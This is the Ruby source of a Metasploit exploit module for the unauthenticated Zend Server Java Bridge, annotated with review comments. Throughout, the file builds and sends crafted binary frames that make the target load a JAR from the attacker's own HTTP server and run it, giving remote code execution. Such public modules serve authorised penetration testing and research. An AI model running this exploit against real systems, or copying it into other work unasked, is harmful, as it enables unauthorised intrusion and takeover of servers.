GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/zend_java_bridge.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Reliability rank reported to the framework for this module.
  Rank = GreatRanking

  # HttpServer supplies start_service / get_uri / send_response, used to serve
  # the payload JAR; Tcp supplies connect / sock, used for the raw Java Bridge
  # session on RPORT. Both an outbound TCP session to the bridge and an inbound
  # HTTP fetch from the target back to this module's server are therefore part
  # of a run.
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (name, description, references, targets) and the
  # single option this module needs: RPORT, defaulting to 10001.
  #
  # @param info [Hash] framework-supplied module info, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Zend Server Java Bridge Arbitrary Java Code Execution',
      'Description'    => %q{
          This module takes advantage of a trust relationship issue within the
        Zend Server Java Bridge. The Java Bridge is responsible for handling interactions
        between PHP and Java code within Zend Server.

        When Java code is encountered Zend Server communicates with the Java Bridge. The
        Java Bridge then handles the java code and creates the objects within the Java Virtual
        Machine. This interaction however, does not require any sort of authentication. This
        leaves the JVM wide open to remote attackers. Sending specially crafted data to the
        Java Bridge results in the execution of arbitrary java code.
      },
      'Author'         => [ 'bannedit' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '71420'],
          [ 'ZDI', '11-113'],
          [ 'EDB', '17078' ],
        ],
      'Platform'       => ['java'], # win
      'Arch'           => ARCH_JAVA,
      'Privileged'     => true,
      'Targets'        =>
        [
          [ 'Linux', {}],
          [ 'Windows', {}],
        ],
      'DisclosureDate' => '2011-03-28',
      'DefaultTarget'  => 0))
    # Only the bridge port is configurable; the HTTP server options come from the mixin.
    register_options( [ Opt::RPORT(10001) ])
  end

  # Entry point: bring up the HTTP server that will answer the JAR request, then
  # start the Java Bridge exchange.
  def exploit
    start_service()
    send_java_require
  end

  # Opens the TCP session to the Java Bridge and sends a setAdditionalClassPath
  # request whose argument is the URL of the JAR served by this module's HTTP
  # server, then hands off to create_and_exec.
  def send_java_require()
    connect

    # Random 1..8 letter file name; on_request_uri only checks the ".jar" suffix.
    jar = rand_text_alpha(rand(8)+1) + '.jar'
    path = get_uri + '/' + jar
    uri_len = path.length
    # 'V' packs little-endian, so 0x16000000 goes on the wire as 00 00 00 16
    # (0x16 == 22 == "setAdditionalClassPath".length), followed by the method
    # name, a second dword pair, a one-byte length and the classpath URL.
    # The meaning of the fields beyond the visible length prefixes is not
    # established by this file — confirm against the bridge protocol before
    # changing them.
    java_require = [0xffffffff, 0x16000000].pack('V*') +
      "setAdditionalClassPath" + [0x01000000, 0x00000004].pack('V*') +
      [uri_len].pack('C') + path

    # NOTE(review): pack('C') keeps only the low byte of uri_len, so a path
    # longer than 255 bytes is silently mis-framed; nothing guards against it.
    # Outer frame: big-endian 4-byte length of the message, then the message.
    java_require = [java_require.length].pack('N') + java_require

    print_status("Sending java_require() request... #{path}")
    sock.put(java_require)
    # NOTE(review): the reply is read but never inspected, so a rejected
    # request is not detected at this point.
    res = sock.get_once

    select(nil, nil, nil, 5) # wait for the request to be handled
    create_and_exec
  end

  # Asks the bridge to instantiate metasploit.Payload (the class expected inside
  # the served JAR), reads the object id from the reply, invokes its main method
  # and then starts the payload handler.
  def create_and_exec
    print_status("Sending Final Java Bridge Requests")

    # 0x0c (12) matches "CreateObject".length and 0x12 (18) matches
    # "metasploit.Payload".length. The trailing 0x07000000 is packed with 'N'
    # (big-endian) unlike the 'V' fields around it — presumably intentional;
    # confirm before touching.
    create_obj =
      [0x34000000, 0x00000000, 0x0c000000].pack('V*') +
      "CreateObject" +
      [0x02000000, 0x00000004].pack('V*') + [0x12].pack('C') +
      "metasploit.Payload" +
      [0x07000000].pack('N') + [0x00].pack('C')

    sock.put(create_obj)
    res = sock.get_once
    # Four bytes at offset 5 of the reply are reused verbatim as the object id.
    # NOTE(review): res is nil when the bridge sends nothing, and a reply shorter
    # than 9 bytes yields nil or a partial slice — neither case is checked, so
    # the next line raises instead of reporting a failed CreateObject.
    obj_id = res[5,4]

    # Invoke main on the created object; 0x04000000 goes out as 00 00 00 04,
    # matching "main".length.
    callmain =
      [0x1f000000].pack('V') + obj_id + [0x04000000].pack('V') + "main" +
      [0x01000000, 0x00000008, 0x00000201, 0x00040000].pack('V*') + [0x00].pack('C') +
      [0x00].pack('C') + [0x00].pack('C')

    sock.put(callmain)
    sock.get_once
    handler()
  end

  # HTTP server callback: any request whose URI ends in ".jar" (case-insensitive)
  # is answered with the encoded payload as a java-archive; other URIs are not
  # answered by this method.
  #
  # @param cli client connection handed in by the HttpServer mixin
  # @param request request object exposing #uri
  def on_request_uri(cli, request)
    # Suffix-only match: the random name chosen in send_java_require is not verified.
    if request.uri =~ /\.jar$/i
      send_response(cli, payload.encoded,
        {
          'Content-Type' => 'application/java-archive',
          'Connection'   => 'close',
          'Pragma'       => 'no-cache'
        })

      print_status("Replied to Request for Payload JAR")
    end
  end
end